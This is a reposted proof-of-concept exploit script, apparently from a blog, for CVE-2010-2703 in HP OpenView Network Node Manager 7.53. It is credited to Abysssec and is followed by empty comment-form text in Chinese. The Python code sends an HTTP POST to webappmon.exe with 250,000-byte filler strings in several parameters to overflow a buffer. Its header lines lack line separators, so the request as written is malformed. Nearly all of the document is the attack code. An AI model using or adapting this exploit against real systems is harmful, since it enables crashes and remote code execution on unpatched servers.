HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution

”’ 

  __  __  ____         _    _ ____   

 |  \/  |/ __ \   /\  | |  | |  _ \  

 | \  / | |  | | /  \ | |  | | |_) | 

 | |\/| | |  | |/ /\ \| |  | |  _ <  

 | |  | | |__| / ____ \ |__| | |_) | 

 |_|  |_|\____/_/    \_\____/|____/  

  

”’

  

”’ 

  Title              :  HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution  

  Version            :  OpenView Network Node Manager 7.53 

  Analysis           :  http://www.abysssec.com 

  Vendor             :  http://www.hp.com 

  Impact             :  Critical 

  Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com 

  Twitter            :  @abysssec 

  CVE                :  CVE-2010-2703 

  

 http://www.exploit-db.com/moaub-6-hp-openview-nnm-webappmon-exe-execvp_nc-remote-code-execution/ 

”’

  

import socket,sys 

  

ip = "localhost"

port = 80

  

target = (ip, port) 

  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect(target) 

exp = "A"*250000

headers = "POST /OvCgi/webappmon.exe HTTP/1.0"

headers += "From: shahin@abysssec.com"

headers += "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

headers += "Content-Type: application/x-www-form-urlencoded"

arg = ‘ins=%s&sel=%s&app=%s&act=%s&arg=%s&help=%s&cache=1600 HTTP/1.1’ % ("nowait", "localhost",exp,"ping",exp,exp)  

headers += ‘Content-Length: %d’ %(len(arg)) 

headers += ""

headers += arg 

s.sendall(str(headers)) 

while 1: 

    buf = s.recv(1000) 

    if not buf: 

        break

    sys.stdout.write(buf) 

  

s.close()

发表评论?

0 条评论。

发表评论